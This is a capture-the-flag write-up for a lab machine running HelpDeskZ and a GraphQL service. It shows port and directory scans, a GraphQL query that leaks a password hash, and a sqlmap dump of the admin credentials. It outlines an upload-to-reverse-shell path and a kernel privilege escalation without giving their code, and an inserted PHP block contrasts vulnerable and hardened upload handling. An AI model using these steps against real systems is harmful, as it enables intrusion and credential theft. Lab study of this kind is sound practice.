Basic information

Port scan

Ports 22, 80 and 3000 are open:

$ nmap -sC -sV -Pn 10.10.10.121

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 14:34 CST
Nmap scan report for 10.10.10.121
Host is up (0.067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.47 seconds

80

Apache default page:

3000

Directory scan

helpdeskz

Port 80 reveals /support, a helpdesk running the open-source HelpDeskZ:

gobuster dir -u http://10.10.10.121/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/javascript (Status: 301) [Size: 317] [--> http://10.10.10.121/javascript/]
/support (Status: 301) [Size: 314] [--> http://10.10.10.121/support/]

README.md shows the version is 1.0.2.

graphql

On port 3000 the hint points to GraphQL; a brute-force directory scan finds it as well:

gobuster dir -u http://10.10.10.121:3000/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50

/graphql (Status: 400) [Size: 18]

graphql

The query format can be enumerated by hand or with a plugin; with the right query you get the user's password hash:

{"data":{"user":{"password":"5d3c93182bb20f07b994a7f617e99cff","username":"helpme@helpme.com"}}}

godhelpmeplz

helpdeskz

Searching turns up two vulnerabilities:

SQL injection

With the account credentials already in hand, log in:

sqlmap can be run directly against the request, which yields the admin password:

sqlmap -r sql.txt -v 3 --level 3 --batch --threads=10 -D support -T staff --dump

Database: support
Table: staff
[1 entry]
+----+-------+------------+--------------------+--------+--------+----------+---------------+----------+-----------------------------------------------------+--------------------------------+------------+--------------------+------------------------+
| id | admin | login | email | status | avatar | username | fullname | timezone | password | signature | last_login | department | newticket_notification |
+----+-------+------------+--------------------+--------+--------+----------+---------------+----------+-----------------------------------------------------+--------------------------------+------------+--------------------+------------------------+
| 1 | 1 | 1547216217 | support@mysite.com | Enable | NULL | admin | Administrator | <blank> | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | Best regards,\r\nAdministrator | 1543429746 | a:1:{i:0;s:1:"1";} | 0 |
+----+-------+------------+--------------------+--------+--------+----------+---------------+----------+-----------------------------------------------------+--------------------------------+------------+--------------------+------------------------+

File upload getshell

Alternatively, via file upload: uploading a PHP file shows a "not allowed" message, but the file has in fact been uploaded; you need to find the filename, after which a reverse shell is possible:
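As an added defensive example (not part of the original write-up and not HelpDeskZ's own code), the ordering bug described above, a handler that saves the file first and rejects it afterwards, beside a version that validates before anything is written; function names, parameter names and the allow-list are assumptions.

```php
<?php
// Added example, not HelpDeskZ's own code. Both functions take a $_FILES entry
// and a target directory (assumed names); only the ordering of the steps differs.

const ALLOWED_EXT = ['txt', 'pdf', 'png', 'jpg', 'gif'];

// Vulnerable ordering: the file is written into the upload directory first and
// the extension is checked afterwards, so the user sees an error message while
// the rejected file stays on disk.
function store_upload_vulnerable(array $file, string $uploadDir): array
{
    $name = basename($file['name']);
    $dest = $uploadDir . '/' . $name;
    move_uploaded_file($file['tmp_name'], $dest);       // already on disk
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return ['ok' => false, 'error' => 'File type not allowed']; // $dest remains
    }
    return ['ok' => true, 'path' => $dest];
}

// Hardened ordering: validate before anything is moved, store under a random
// server-chosen name in a directory outside the web root (with script
// execution disabled there), and check the content type server-side.
function store_upload_hardened(array $file, string $storeDir): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return ['ok' => false, 'error' => 'Upload failed'];
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return ['ok' => false, 'error' => 'File type not allowed']; // nothing written
    }
    // Sniff the real content instead of trusting the client's Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $allowedMime = ['text/plain', 'application/pdf', 'image/png', 'image/jpeg', 'image/gif'];
    if (!in_array($mime, $allowedMime, true)) {
        return ['ok' => false, 'error' => 'File content does not match its type'];
    }
    $dest = rtrim($storeDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return ['ok' => false, 'error' => 'Could not store file'];
    }
    return ['ok' => true, 'path' => $dest];
}
```

A random server-side name only complements the check; the decisive fix is that a rejected upload never reaches disk.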

user flag

Log in over SSH with the password obtained earlier, or use the help shell from the file upload, to read user.txt:

Privilege escalation information

Kernel privilege escalation:

help@help:~$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Privilege escalation & root flag

Any working exploit for this kernel escalates to root; then read root.txt:

References